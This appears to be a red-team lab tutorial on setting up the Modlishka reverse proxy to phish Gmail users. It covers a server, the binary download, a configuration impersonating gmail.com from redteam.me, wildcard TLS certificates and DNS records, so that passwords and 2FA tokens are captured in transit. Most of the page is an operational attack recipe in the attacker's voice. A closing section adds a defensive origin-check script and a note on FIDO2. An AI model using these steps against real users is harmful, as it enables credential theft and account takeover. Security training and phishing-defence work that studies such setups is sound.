# Phishing with Modlishka Reverse HTTP Proxy

This lab shows how to set up the reverse HTTP proxy `Modlishka`, which can be used in phishing campaigns to steal user passwords and 2FA tokens. Modlishka makes this possible because it sits in the middle (MITM) between the website you, as the attacker, are impersonating and the victim, recording all the traffic, tokens and passwords that traverse it.

## Setup

Let's start off by building a new DigitalOcean droplet; the smallest size is more than enough:

![](/files/-LiFT3Wwfnnbn0J8xgzZ)

Once logged on, install certbot and download the Modlishka binary itself:

```bash
apt install certbot
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64 ; ls -lah
```

![](/files/-LiFT9ga7bDsW9ghRRgY)

## Modlishka Configuration

Let's create a configuration file for modlishka:

![](/files/-LiFTFMH3mWerGfyOEOV)

{% code title="modlishka.json" %}

```javascript
{
  // domain that you will be tricking your victim into visiting
  "proxyDomain": "redteam.me",
  "listeningAddress": "0.0.0.0",

  // domain that you want your victim to think they are visiting
  "target": "gmail.com",
  "targetResources": "",
  "targetRules": "PC9oZWFkPg==:",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules": "",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "requests.log",
  "plugins": "all",
  "cert": "",
  "certKey": "",
  "certPool": ""
}
```

{% endcode %}

## Wildcard Certificates

Important - let's generate a wildcard certificate for the domain I want my phishing victims to land on, `*.redteam.me`:

```bash
# quote the wildcard so the shell does not try to glob-expand it
certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d '*.redteam.me' --email noreply@live.com
```

This will generate a challenge code as shown below:

![](/files/-LiFTLunFfm_iKTxk2ex)

We need to create a DNS TXT record in the DNS management console for redteam.me, which in my case is in Digital Ocean:

![](/files/-LiFTP6nWIhABPjfkYqM)

Once the DNS TXT record is created, continue with the certificate generation:

![](/files/-LiFTZBUf3IYKGYnw8A-)

Once certificates are generated, we need to convert them to a format suitable to be embedded into JSON objects:

```bash
awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/fullchain.pem
awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/privkey.pem
```

![](/files/-LiFTg4wQyv650OJ3iDA)

Once that is done, copy the contents of the certs into the config: `fullchain.pem` into the `cert` field and `privkey.pem` into the `certKey` field:

![](/files/-LiFTkpsH6Ip5K0TvQIt)

## More DNS Records

Let's create an A record for the root host `@` that simply points to the droplet's IP:

![](/files/-LiFTp-GjlgmdT-c-g4T)

This is very important - we need a `CNAME` record for any host/subdomain `*` pointing to `@`:

![](/files/-LiFTu8I9q-pAD0c5HDZ)

## Launching Modlishka

We are now ready to start the test by launching modlishka and giving it the modlishka.json config file:

```bash
./Modlishka-linux-amd64 -config modlishka.json
```

The screenshot below shows how, by visiting redteam.me, I get presented with the contents of gmail.com, indicating that Modlishka and the MITM work. Again, it is important to call it out: we did not create any copies or templates of the targeted website. The victim is actually browsing Gmail; it is just being served through Modlishka, where the traffic is inspected and passwords are captured:

![](/files/-LiFU2dkA0CS1OQJS4J5)
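The key observation above is that the victim's browser is on the proxy's domain, not the real one. The following is an added example, not code from the original page or from the Modlishka project: an origin-integrity check that the legitimate site's own JavaScript can run to notice that it is being rendered under a foreign hostname. The allowed host list and the `/origin-report` endpoint are assumptions.

```javascript
// Origin-integrity check for a legitimate login page (added example, not from the
// page or the Modlishka project). EXPECTED_HOSTS and /origin-report are assumed names.
const EXPECTED_HOSTS = ['accounts.example.com', 'example.com'];

// True only when `hostname` is exactly an allowed host or a subdomain of one.
// The dot-boundary test rejects look-alikes such as "example.com.redteam.me"
// and "evil-example.com", which a naive endsWith() would accept.
function isExpectedHost(hostname, allowed = EXPECTED_HOSTS) {
  const h = String(hostname).toLowerCase().replace(/\.$/, '');
  return allowed.some((a) => {
    const base = a.toLowerCase();
    return h === base || h.endsWith('.' + base);
  });
}

// Evaluate a location-like object ({protocol, hostname}) and return a verdict
// the page can act on. Pure function, so it can be tested outside a browser.
function checkOrigin(loc, allowed = EXPECTED_HOSTS) {
  const hostOk = isExpectedHost(loc.hostname, allowed);
  const tlsOk = loc.protocol === 'https:';
  const ok = hostOk && tlsOk;
  return {
    ok,
    reason: ok ? 'origin-ok' : (!hostOk ? 'unexpected-host' : 'not-https'),
    // Only the observed host and scheme are reported; no user data is sent.
    report: ok ? null : { observedHost: loc.hostname, protocol: loc.protocol },
  };
}

// Browser glue: runs only when a window exists. On mismatch it hides every form
// so credentials are not typed into a proxied page, and sends a beacon to the
// (hypothetical) /origin-report endpoint so the defenders see the foreign host.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const verdict = checkOrigin(window.location);
  if (!verdict.ok) {
    document.querySelectorAll('form').forEach((f) => { f.hidden = true; });
    if (navigator.sendBeacon) {
      navigator.sendBeacon('/origin-report', JSON.stringify(verdict.report));
    }
  }
} else {
  // Stand-alone run (e.g. node): show the verdict for a proxied hostname.
  console.log(checkOrigin({ protocol: 'https:', hostname: 'redteam.me' }));
}
```

A proxy that rewrites the responses it relays can strip or alter this script, so treat it as a detection signal rather than a control; the control that actually defeats this kind of MITM is an origin-bound authenticator (FIDO2/WebAuthn), whose credential is scoped to the genuine origin and cannot be replayed from the proxy's domain.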

## References

{% embed url="https://github.com/drk1wi/Modlishka" %}
